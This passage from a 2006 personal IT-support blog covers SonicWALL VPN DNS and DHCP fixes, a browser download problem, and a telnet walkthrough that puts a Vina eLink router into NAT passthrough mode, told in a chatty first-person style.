That being said, when users on the remote end of the VPN tunnel ("network B") are connecting, they should *also* use that DNS server. What you will find though, is that they are probably configured to use a public (Internet) DNS server when they connect. That's because you configured DNS on the SonicWALL for the WAN Interface. It then uses those DNS servers as the primary and secondary servers for it's DHCP scope. So, if this is a "site to site" tunnel, you will need to change the DHCP scope of that local SonicWALL having the name resolution issues. If you are using a remote user VPN (WAN GroupVPN) you need to change the DHCP scope of the SonicWALL that they are connecting to. You should *not* change the WAN Interfaces DNS server addresses. You don't need to!

You would do this: Click Network > DHCP Server. Then click the configure button next to the scope. Next click the DNS/WINS tab. You will notice that the SonicWALL defaults to "inherit DNS Settings". You will change it to "Specify Manually" and ensure that the first address is the DNS server on "network A" (the one with all the answers!). You might want to configure a second address of an Internet DNS server. One that will answer queries for Internet domains. That is more of a fail-safe in case the primary DNS server stops responding. It should *not* be used as an attempt to answer *all* Internet queries. Remember, your primary should be set up with DNS forwarders for that!

Use Your Domain Name - Quick, look at that illustration above. Is your domain name configured as part of your DHCP scope? It ought to be. Most folks think this is optional. But if you want your DNS server to complete your queries, this needs to be set to your name. That is, I might ask your DNS server who "SERVER1" is, and it doesn't know. But if I ask it who "SERVER1.mydomainname.com" is, I get an answer. Add your domain name to your scope, and you will fix a lot of complaints from users. If SonicWALL is not performing DHCP, and you cannot fix this on your own - consider fixing this problem on your local network adapter (or virtual VPN adapter). Basically, you drill down to IP Properties, then "Advanced", then DNS, then add a "domain name suffix" in that box near the bottom. Case closed.

Still Using WIN's? - You ought to be ashamed! But if you are using WIN's, you probably can solve your name resolution problems by adding WIN's servers to your DHCP scope. If SonicWALL is performing DHCP for you, refer to the previous illustration to see how that would be done. If you are not using WIN's, I congratulate you. WIN's was designed as a way to manage(?) NetBIOS name resolution. Most of us use DNS now (or Dynamic DNS) and we are much better for it.

If none of that worked, and you are still having name resolution problems on your SonicWALL VPN, you should send me a comment or an email. Yes, I will help you. I'm that kind of guy.

-Steve Ballantyne

Downloaded Files Disappear

2006-11-25T16:21:00.000-08:00

My brother in law asked me a few weeks ago about a problem he was having. He would download files from the Internet - and they would "vanish". No sooner did the download finish, than the window would disappear and there would be no file to show for it. What really bothered me is that I have had that problem in the past and I couldn't for the life of me remember what I did to fix it.

Today I was there for Thanksgiving, and I noticed a few things. First, this was a "kids" computer. Kids do strange things with PC's that adults would never think of. Second, it had a lot of anti-spyware tools (maybe a few too many). Lastly, the copy of Symantec Antivirus that it had was a tad out of date.

So I went to work first removing as much as I could. First I tried to empty out the temporary Internet files ... which oddly enough seemed to hang and never complete. Could this be a problem from installing a new browser (Internet Explorer 7)? My brother in law says "this problem started before then, and I hoped it would go away with the upgrade". I agreed.

For my next trick I headed into Add/Remove Programs in Control Panel, and started removing. Anything that he and I couldn't identify, was removed. Then I took out Microsoft Defender, Spybot Search and Destroy, and Ad-Aware. All of them are good programs, but none of them were up to date (thanks to the inability to download anything). Lastly, I updated his Symantec Antivirus with the latest stuff - which actually took several reboots to accomplish.

After all the fiddling and removing of stuff - his browser worked once again. What did we remove that fixed it? My guess is that this was caused by Spybot Search and Destroy's Tea-Timer plug-in which is designed to protect your browser from outside threats. It's never been considered all that stable, and may cause more problems than it solves. But the idea of a browser protector seemed pretty good when it debuted. At any rate, it was likely protecting the browser in a way that made downloading or installing anything through the browser relatively impossible.

And some would probably say "why didn't you just install Firefox?". Let's say that your sink backs up and water starts shooting out onto the kitchen floor. Are you going to start washing dishes in the bathroom? Internet Explorer is a Windows component these days. If it's having a breakdown of some sort, it should be fixed. While it did take a good couple hours of off and on attention, it was good to see that I fixed it. The alternative was to of course reinstall Windows - and hundreds of kids games.

I'd say we made out.

-Steve Ballantyne

The Vow of Vina

2006-11-25T07:06:00.000-08:00

Have you ever heard of a Vina eLink device? I sure hadn't. We had this new customer who had been using one of these little devices for several years with his T1 (fiber) connection through Nuvox. Of course, this was a Time Warner customer ... which kind of made me wonder why I had never heard of one of these little things.

Heck, I had to go out Googling to find anything. What I found was a lot of forums where people were asking each other where to find documentation (a bad sign) and a couple redirectors to websites that no longer exist. This is when http://web.archive.org/ comes in very handy. I pull up this Vina companies web site from a year or so ago (when it still was "live") and it seems that they have been acquired. Good news, actually. Next I go out looking for the company that bought them. Sadly, they too have closed their doors forever and accepted financial defeat.

The best information I could find on this device ended up being from eBay, where kind folks were trying to unload these little devices, and make them sound appealing. I was at least able to get a photo of this device that I would be supporting from afar.

It looks like a very cheap cable modem ... or something. At any rate, this company had one and wanted to keep using it. Normally, I would tell them to get that peice of junk out of my way so that we could put our SonicWALL where it belongs. After talking to the Time Warner sales contact for this account, I learned that they were going to be a Nuvox customer a little longer than intended. In other words, Time Warner's installation was delayed for a few months while they cut through all the red tape trying to lay fiber conduits. But the SonicWALL had to be installed to support the VPN this guy wanted.

One might wonder why I volunteered to work on "Black Friday", the biggest shopping day of the year. There were a couple of perks. One being, that I got to choose any other day I wanted and have that day off in trade. The second being that it was a holiday for most of the free world ... and I didn't expect many phone calls. I was half right. The entire day I got maybe five phone calls. It just happens that one of those calls was to make this stupid little router work.

The customer called, and we bagan to play with various settings. I would ask him what he saw in the way of physical connections and telnet dialogue with the device, and he would try to relay that information back to me. We got nowhere fast. After an hour or so, he asked "would you like to connect and try some things?". My first response was "I have zero knowledge in configuring these devices", and my second response was "what's the password?". So in I went.

It kind of ran like a Cisco router. That is, the CLI was quite similar. That is, you had all sorts of settings, within settings, withing settings ... you get the idea. The organization was "hierarchical" and horrible to trip through. I also found that the engineers made an attempt to shorten all of the settings to one or two hyphenated words. A setting of "ip" made you wonder just what were you setting the IP to, exactly?

I also found that the customer knew far more about this device, and how he had configured it. What are these "groups" I see here? He answers, "grouped settings". I ask, "you mean like VLANS ... or trunks?". He answers "yes", indicating that he clearly has no idea himself. From the appearance, it looked like he had a combination of addresses that were being NAT'd from public addresses to private ones ... but also some addresses that were being passed clean through. Which led me to believe that his mail server might be publically accessible, without any firewall whatsoever. I knew at this point, that I would never be able to configure this device without some sort of assistance. "Let me call you back", I said.

My next phone call was to Nuvox. If you have not dealt with Nuvox, let me say a few polite words about them. Whenever I have asked them for documentation about a customer such as "what IP block do they have, and what would their gateway be" I am always given a very complete list of everything I need to know - and it's always been e-mailed quickly. When I have had to call them, I always get a live person relatively easily ... and they have never been unhelpful "screen readers". I prayed for the best and dialed the number.

I got a guy named "Jimmy" who was about to make my day. Jimmy had full knowledge of these devices, and he was happy to share that with me. It probably also made Jimmy feel a little better when I assured him that while I knew nothing about this little device, I wasn't a complete moron. He asked very simply "what is it that you want this device to do for you?". My response was "can we just pass everything through it, and put it in a transparent mode?". His answer was a resounding "absolutely". Now here is what sets the support apart from most people you are familiar with having to deal with. When Jimmy asked whose device this was, I had to tell the truth. "They bought it man ... but if it helps, they bought it from you". I went on to tell him that I know this is not his problem, but that didn't seem to matter to him. "I can't configure the device for you - but I can tell you exactly what you need to do". Thank you Jimmy.

Here is what we did. Now, pay attention - because what we are going to do here is to put a Vina router in "passthrough mode". That means that it's no longer going to perform NAT to private addresses any more. Rather, my SonicWALL which will be plugged into it - is going to have a public address. Now, on with the show.

We start by logging in, which meant a telnet session to it's public IP address ...

telnet x.x.x.x

Vina Technologies eLink 216 (5.1.1 build 12)
Built: Jun 3 2002, 18:25:46
NVRAM version 0117
PB $Id: romInit.s,v 1.7 1997/09/26 23:43:22 bob Exp $

Copyright 1996 - 2002 VINA Technologies, Inc.
Please enter name: your name here

Enter password: your password here

After putting in the credentials, you are at the "top" of a horrible hierarchy. Much like you would with a Cisco, you are going to configure this guy. So type "config" and [enter].

Next, we are at the "config" prompt, and we want to move into the Ethernet settings. So type "ether" for short, then [enter].

Once at the Ether prompt, you will see that I did a "?" [enter] to get a view of what was in the config now. Jimmy told me that I should probably do this (if for no other reason) so that I could save this session and use it to undo any actions that might screw things up. Good advice Jimmy. I also decided it would make good Blog material.

logged on as Carrier

>config

(config)>eth

(config:Ethernet)>?
IP-address : 192.168.100.1 (IP-address)
netmask : 255.255.255.0 (IP-address)
secondary-ip : 192.168.100.3 (IP-address)
sec-netmask : 255.255.255.0 (IP-address)
RIP : Disable (EnableRxOnlyTxOnly[Disable])
version-RIP : 1 (12)
Link-integrity-test : on (off [on])
Help
!

See that? This thing is running with a public IP address. That's because it's performing NAT for us know. But that will become my SonicWALL's job. Therefore, we are going to give it the public IP address that I have set aside for it. This router may also have a "secondary" IP address. I'm not sure why I would want that, or how it would even be helpful. But we are going to wipe it out, by replacing it with an address of "0.0.0.0". Note that the last two octets of the public IP address have been blocked out (with x's) to "protect the innocent". ;-)

(config:Ethernet)>ip-address 64.119.x.x
(config:Ethernet)>netmask 255.255.255.248
(config:Ethernet)>??
IP-address : 64.19.x.x (IP-address)
netmask : 255.255.255.248 (IP-address)
secondary-ip : 192.168.100.3 (IP-address)
sec-netmask : 255.255.255.0 (IP-address)
RIP : Disable (EnableRxOnlyTxOnly[Disable])
version-RIP : 1 (12)
Link-integrity-test : on (off [on])
Help
!

(config:Ethernet)>
(config:Ethernet)>secondary-ip 0.0.0.0

(config:Ethernet)>?
IP-address : 64.19.x.x (IP-address)
netmask : 255.255.255.248 (IP-address)
secondary-ip : 0.0.0.0 (IP-address)
sec-netmask : 255.255.255.0 (IP-address)
RIP : Disable (EnableRxOnlyTxOnly[Disable])
version-RIP : 1 (12)
Link-integrity-test : on (off [on])
Help
!

That last "?" was just to see it, get a good look, and to double check my work. Next, we need to go kill off NAT. We don't want it doing that any more. So first, we will type "exit" and [enter] once to get back to the main prompt. Then we will enter the "nat" config with the command "nat". Finally, we will disable it with a rather cryptic "enable off" command.

(config:Ethernet)>exit
(config)>nat

(config:NAT)>?
enable : on ([off] on)Dynamic ...
Static ...
PassThru ...
Show-sessions alludptcpicmpconfig
Clear-sessions alludptcpicmp
Help
!

(config:NAT)>enable off

(config:NAT)>exit

If at any time you might worry that we are going to disconnect ourselves, you may rest assured that these changes aren't going to go into effect until we apply them at the very end. If at any time we get cold feet, we could exit the config or power cycle this device and nothing would be changed.

Now, we also need to disable DHCP. It wouldn't make much sense for this device to continue handing out private addresses, when it will no longer perform NAT to those addresses.

(config)>dhcp

(config:DHCP)>?

enable : off ([off] on)
start-ip : 192.168.0.2 (IP-address)
end-ip : 192.168.0.254 (IP-address)
private-network : on (off [on])
lease-time : 600 (seconds([600]:600...7200))
dns-server : 192.168.0.1 (IP-address)
domain : (name-string)
Help
!

(config:DHCP)>enable off

(config:DHCP)>exit

Now we are almost done. We have one last step, and that's to put this thing in it's "transparent" mode. In doing so it will become a passive device. Yet, here is where I fouled up something that I later had to go back and fix. If you had enabled "passthru" on this device for any particular "group" that you configured, you will need to go disable that now. I didn't record this part of the configuration, as most people would have never attempted that. In fact, I am fairly sure that the customer hadn't meant to configure it that way, and Jimmy at Nuvox didn't catch it.

And now, the exciting conclusion ...

(config)>syn

(config:Synchronous-interface)>mod

(config:Frame-relay)>pvc 1

(config:FrameRelay:PVC1)>show

DLCI : 100 (dlci (16...991))
IP-address : 64.19.x.x (IP-addressEnet[Disable])
netmask : 255.255.255.248 (IP-address)
RIP : Disable (EnableRxOnlyTxOnly[Disable])
version-RIP : 1 ([1]2)
ENAT : OUT (PASSIN[OUT])
Help
!

(config:FrameRelay:PVC1)>enat pass

(config:FrameRelay:PVC1)>exit

(config:Frame-Relay)>exit

Brace yourself.

You are about to embark on a mission that you may not return from. You are about to save this configuration. I will warn you, there is no turning back (dum-dum-duuum!). I also should warn you that it's going to say that it will "interrupt your Data traffic" and then *hang*. And when I say it hangs, I mean that you wille get no response for a good minute or two. Do not panic. It will come back to you. Jimmy also assured me that he has never lost communication at this point, even when he was sure he had screwed things up.

(config)>save
Verifying system configuration...
Do you really want to update the system NVRAM configuration?
This may cause a temporary interruption of Data traffic [n]y: y
Updating Flash NVRAM,... wait
Updating Protected Boot Flash NVRAM... wait
DONE

That was it. The device rebooted itself, I thanked Jimmy for all of his help, and I assured him that if in fact we broke this configuration, I would never blame him for it. I also wished him a happy holiday, and leant him a bit of pity that I shared - as we had to be the only suckers that came into work on this would be day off.

After a few moments of silence, and prayer ... the device was back up. I had been running a continous ping to the device at it's newly assigned public IP address.

ping -t 64.19.x.x

At first I was getting "TTL expired in transit" messages, which indicated an upstream router was dumping off the packets because it couldn't find an appropriate place to send them. Once those turned into "Reply" messages, I was overjoyed.

Yet, I was still unable to ping my SonicWALL. I know I had configured it with the correct address. But my ping response was coming back "no response". It looked as if my packets were getting to the SonicWALL, but there was nothing coming back. Ah! The gateway. In my haste to get the device configured, I had never changed the SonicWALL's WAN interface gateway.

Note to self: next time, change the SonicWALL first - before losing connection to it forever.

Now I had to bite the bullet and call the customer. "We are so close to having this work", I assured, "but I am going to need your help". While the customer was not all that technically "with it" (he was the first to say so), he was pretty good at following instructions. With that, I walked him through connecting to the SonicWALL and changing the WAN interface gateway IP. What is the SonicWALL's WAN gateway? Why, it's that *same* address that we gave to the Vina eLink.

Now, to see if the SonicWALL was even connected to the Vina and "speaking to it", I ran another telnet session back into the device to check it's ARP cache.

telnet 64.19.x.x

Vina Technologies eLink 216 (5.1.1 build 12)
Built: Jun 3 2002, 18:25:46
NVRAM version 0117
PB $Id: romInit.s,v 1.7 1997/09/26 23:43:22 bob Exp $

Copyright 1996 - 2002 VINA Technologies, Inc.
Please enter name: your name here
Enter password: your password here

logged on as Carrier

(config)>arp

(config:ARP)>show
64.19.x.x at 0:6:b1:x:x:x

(config:ARP)>

(config)>exit

Good, good. What that told me, is that the SonicWALL is communicating with the Vina, and the customer must have plugged it in correctly (he actually hadn't plugged it in right, but I am omitting the 30 minutes or so that it took me to figure that out).

Now, I could once and for all connect to my SonicWALL and configure the device the rest of the way. One server at a time, I created the needed NAT Policies and Access Rules. Everything from here on was clockwork.

Lessons learned?

1) Don't believe the customer when he says he plugged it in right. Even after he says he has double checked it too. I have found that it helps to ask the customer where things go, and make them tell you what is connected to what devices. In a polite way, suggest what you all ready know - "well it just seems that the blue cable is connected to the red port ... is that possible?".

2) Don't assume that the ISP's telephone support will be worthless. While most companies send those calls overseas to a foreign "screen reader", this company took me straight to the resolution without tripping through a maze of prompts. Had I called them to begin with, I probably would have cut a few hours out of this lengthy process.

3) Remember to make your changes to devices, that you will ultimately loose access to - while you have the chance. Leading the customer through changing things for you is tedious, frustrating, and time consuming.

I might add a final step here, if you are someone in the sales Field. The motto is not "over-promise and under-deliver". You had better not agree to hooking up your equipment in an environment that you are not familiar with yourself. Not all devices are created equal. What works and is supported now, may not be once everything is connected. In this particular situation, the customer hadn't lost interest in his new service thanks to the effort we put forth. I should add here, that we started trying to get everything to work nearly one month earlier.

There is a another good story that follows this one. I will make the long story short.

The customer returned home, and connected his cable modem, and then his SonicWALL behind it which had both been sitting in a box for a couple of weeks. Then he called me. He was anxious to get the VPN tunnel built between work and home so that he could access everything at the office, from his home office. I walked him through hooking everything up, and I made my first attempts to connect to the SonicWALL by it's registered Dynamic DNS host name. The SonicWALL, as planned, had made contact and updated it's DNS record with it's new public address. What was that public address? 192.168.0.13. Yes, it had been loaned a private address from none other than the cable modem (router) in front of it. There was no possible way that I was going to be able to fix this one. Time Warner doesn't allow us access to their cable modems, and we needed to do the same thing to that modem that we worked on all day with his Vina.

I let him down easy. "I have a technician to murder Monday morning ... in the mean time this is not going to work". He was content with that knowing that I had just put four hours or more into this process and I was just as disappointed that we had hit a stone wall as he was. Again, he thanked me for the work, I thanked him for his patience, and we ended the day.

Happy Thanksgiving,
-Steve Ballantyne

Professional Blogging

2006-11-24T10:35:00.000-08:00

For several years now I have run a Blog. Now, you may say "but Steve, where is this Blog that you speak of?” It's out there in cyberspace somewhere, publicly hidden. How do you hide something publicly? That's easy. You post under an alter ego. For many years I have entertained, impressed, and sometimes depressed my peers with the daily happenings of my life. Meanwhile, my professional career has never clearly been documented.

There have been countless occasions where I need to remember how I solved a particular issue - only to find that I never scrawled it down. Never more!

Additionally, this Blog may just be an interesting account of the stuff that Steve wastes his time on while under willful employment.

Enjoy.

-Steve Ballantyne